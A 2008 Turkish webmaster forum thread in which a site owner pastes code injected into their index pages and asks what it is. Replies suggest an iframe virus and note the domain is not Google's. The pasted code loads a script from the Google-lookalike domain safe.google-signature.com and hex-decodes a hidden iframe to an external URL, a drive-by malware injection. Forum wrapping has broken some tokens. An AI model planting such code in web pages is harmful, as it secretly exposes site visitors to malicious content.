• 07-04-2008, 10:04:14
    #1
    Bu site bilgisayarınıza zarar verebilir. Yazısına alışkınım herzaman toplistleri kaldırdıktan sonra mail atarım düzelir fakat bu sefer daha ilginç bi olay oldu.
    Google Site Yöneticisi Araçlarını biraz kurcaladım sonra hermzana yaptığım gibi mailimi attım ve google tüm sayfalarımın indexini acayip bi şekidle sildi index.html ve index.php silerek şu aşağıdaki kodları attı

    <script src="http://safe.google-signature.com/webanalytics.js"></script><script>function v47f88a215c9fe(v47f88a215ca03){ var v47f88a215ca0b=16; return(parseInt(v47f88a215ca03,v47f88a215ca0b));}f unction v47f88a215ca2b(v47f88a215ca2e){ var v47f88a215ca37=2; var v47f88a215ca30='';for(v47f88a215ca33=0; v47f88a215ca33<v47f88a215ca2e.length; v47f88a215ca33+=v47f88a215ca37){ v47f88a215ca30+=(String.fromCharCode(v47f88a215c9f e(v47f88a215ca2e.substr(v47f88a215ca33, v47f88a215ca37))));}return v47f88a215ca30;} document.write(v47f88a215ca2b('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D366 53135333032207372633D5C27687474703A2F2F75726C2F3F2 72B4D6174682E726F756E64284D6174682E72616E646F6D282 92A3533353836292B2735346331396531306366345C2720776 96474683D323239206865696768743D323334207374796C653 D5C27646973706C61793A206E6F6E655C273E3C2F696672616 D653E27293C2F5343524950543E'));</script>

    Sizce bu Nedir Google otomotik url googleye yönlü
  • 07-04-2008, 10:05:32
    #2
    Üyeliği durduruldu
    yok artık ben şimdi www.xxx-mynet-yyy.com diye bi yere yönlendirsem mynet mi hacklemiş olcak
  • 07-04-2008, 10:08:28
    #3
    tahminim iframe virüsü sayfalarına girmiştir ve google aramalrda senin sayfanı kendi url si üzerinden yönlendiriyordur. ama senin sayfalarına kod eklemesi nasıldır bilemem.
  • 07-04-2008, 10:14:18
    #4
    Üyeliği durduruldu
    şaşırdım
  • 07-04-2008, 10:34:55
    #5
    Google-signature.com - Google Signature
    Whois ceksen görüceksin seni hackleyeni.
  • 07-04-2008, 10:53:21
    #6
    Üyeliği durduruldu
    bilenbiri adlı üyeden alıntı: mesajı görüntüle
    şaşırdım
    Nası şaşırırsın üyelik adın bilenbiri senin şaşırmaman lazımdı
  • 07-04-2008, 11:00:01
    #7
    Üyeliği durduruldu
    DaBuLyU adlı üyeden alıntı: mesajı görüntüle
    Nası şaşırırsın üyelik adın bilenbiri senin şaşırmaman lazımdı

    komik


    ayrıca domain google'a ait değil arkadaşım. Google'a mail at
  • 07-04-2008, 13:02:04
    #8
    yardımlar için teşekkürler ama anladığım kadarıyla bu hackd eğil başka bişe ama ne çözemiyecem üstelik o domaın google ye yönlü değilmi safe.google-signature.com tıkaldığımzıda google açılıyor
  • 07-04-2008, 13:03:27
    #9
    Üyeliği durduruldu
    domaşni yönlendirmiş olabilirler.